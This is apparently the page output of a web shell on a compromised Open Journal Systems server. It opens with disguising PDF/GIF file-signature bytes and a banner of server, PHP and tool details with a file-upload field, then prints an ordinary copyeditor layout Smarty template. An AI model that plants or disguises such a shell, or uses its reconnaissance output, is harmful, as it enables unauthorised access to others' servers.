%PDF-1.7 GIF89;
| Server IP : 104.20.45.2 / Your IP : 172.16.20.3 Web Server : Apache/2.4.25 (Debian) System : Linux f64a392e70de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 User : application ( 1000) PHP Version : 5.6.40 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /app/plugins/themes/JetliJournal/templates/copyeditor/submission/ |
Upload File : |
{**
* templates/copyeditor/submission/layout.tpl
*
* Copyright (c) 2003-2012 John Willinsky
* Distributed under the GNU GPL v2. For full terms see the file docs/COPYING.
*
* Subtemplate defining the layout editing table.
*}
{assign var=layoutSignoff value=$submission->getSignoff('SIGNOFF_LAYOUT')}
{assign var=layoutFile value=$submission->getFileBySignoffType('SIGNOFF_LAYOUT')}
{assign var=layoutEditor value=$submission->getUserBySignoffType('SIGNOFF_LAYOUT')}
<div id="layout">
<h3>{translate key="submission.layout"}</h3>
{if $useLayoutEditors}
<div id="layoutEditors">
<table width="100%" class="data">
<tr>
<td class="label" width="20%">{translate key="user.role.layoutEditor"}</td>
<td class="value" width="80%">{if $layoutSignoff->getUserId()}{$layoutEditor->getFullName()|escape}{else}{translate key="common.none"}{/if}</td>
</tr>
</table>
</div>
{/if}
<table width="100%" class="info">
<tr>
<td width="40%" colspan="2">{translate key="submission.layout.galleyFormat"}</td>
<td width="60%" class="heading">{translate key="common.file"}</td>
</tr>
{foreach name=galleys from=$submission->getGalleys() item=galley}
<tr>
<td width="5%">{$smarty.foreach.galleys.iteration}.</td>
<td width="35%">{$galley->getGalleyLabel()|escape} <a href="{url op="proofGalley" path=$submission->getId()|to_array:$galley->getId()}" class="action">{translate key="submission.layout.viewProof"}</td>
<td><a href="{url op="downloadFile" path=$submission->getId()|to_array:$galley->getFileId()}" class="file">{$galley->getFileName()|escape}</a> {$galley->getDateModified()|date_format:$dateFormatShort}</td>
</tr>
{foreachelse}
<tr>
<td colspan="3" class="nodata">{translate key="common.none"}</td>
</tr>
{/foreach}
<tr>
<td colspan="3" class="separator"> </td>
</tr>
<tr>
<td colspan="2">{translate key="submission.supplementaryFiles"}</td>
<td class="heading">{translate key="common.file"}</td>
</tr>
{foreach name=suppFiles from=$submission->getSuppFiles() item=suppFile}
<tr>
<td width="5%">{$smarty.foreach.suppFiles.iteration}.</td>
<td width="35%">{$suppFile->getSuppFileTitle()|escape}</td>
<td><a href="{url op="downloadFile" path=$submission->getId()|to_array:$suppFile->getFileId()}" class="file">{$suppFile->getFileName()|escape}</a> {$suppFile->getDateModified()|date_format:$dateFormatShort}</td>
</tr>
{foreachelse}
<tr>
<td colspan="3" class="nodata">{translate key="common.none"}</td>
</tr>
{/foreach}
<tr>
<td colspan="3" class="separator"> </td>
</tr>
</table>
<div id="layoutComments">
{translate key="submission.layout.layoutComments"}
{if $submission->getMostRecentLayoutComment()}
{assign var="comment" value=$submission->getMostRecentLayoutComment()}
<a href="javascript:openComments('{url op="viewLayoutComments" path=$submission->getId() anchor=$comment->getId()}');" class="icon">{icon name="comment"}</a>{$comment->getDatePosted()|date_format:$dateFormatShort}
{else}
<a href="javascript:openComments('{url op="viewLayoutComments" path=$submission->getId()}');" class="icon">{icon name="comment"}</a>{translate key="common.noComments"}
{/if}
</div>
</div>